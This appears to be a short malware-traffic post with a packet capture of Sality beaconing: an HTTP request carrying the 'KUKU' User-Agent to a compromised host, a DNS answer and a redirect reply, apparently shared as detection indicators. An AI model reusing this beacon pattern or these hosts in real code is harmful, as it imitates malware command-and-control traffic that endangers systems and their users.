MALWARE – Sality – Historical Traffic Sample User-Agent: KUKU

By | July 25, 2015

2013-02-03 17:24:12.573644 IP 172.16.253.129.1051 > 97.74.182.1.80: Flags [P.], seq 1:135, ack 1, win 64240, length 134

E….S@…9…..aJ…..Pt…OR.LP…….GET /mainh.gif?114ce4=11337960 HTTP/1.1

User-Agent: KUKU v5.06exp =9355466431

Host: www.livelife-eg.com

Cache-Control: no-cache

 

 

2013-02-03 17:24:12.576583 IP 97.74.182.1.80 > 172.16.253.129.1051: Flags [.], ack 135, win 64240, length 0

E..(……z.aJ…….P..OR.Lt..@P………….

2013-02-03 17:24:12.623503 IP 4.2.2.2.53 > 172.16.253.129.53: 64245 2/0/0 CNAME livelife-eg.com., A 97.74.182.1 (67)

E.._……………..5.5.K.m………….www.livelife-eg.com……………………….X..aJ..

2013-02-03 17:24:12.779947 IP 97.74.182.1.80 > 172.16.253.129.1051: Flags [P.], seq 1:365, ack 135, win 64240, length 364

E………y.aJ…….P..OR.Lt..@P…….HTTP/1.1 301 Moved Permanently

Date: Sat, 17 Aug 2013 16:03:46 GMT

Server: Apache

X-Pingback: http://livelife-eg.com/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Location: http://livelife-eg.com/mainh.gif?114ce4=11337960

Content-Length: 0

Content-Type: text/html; charset=UTF-8
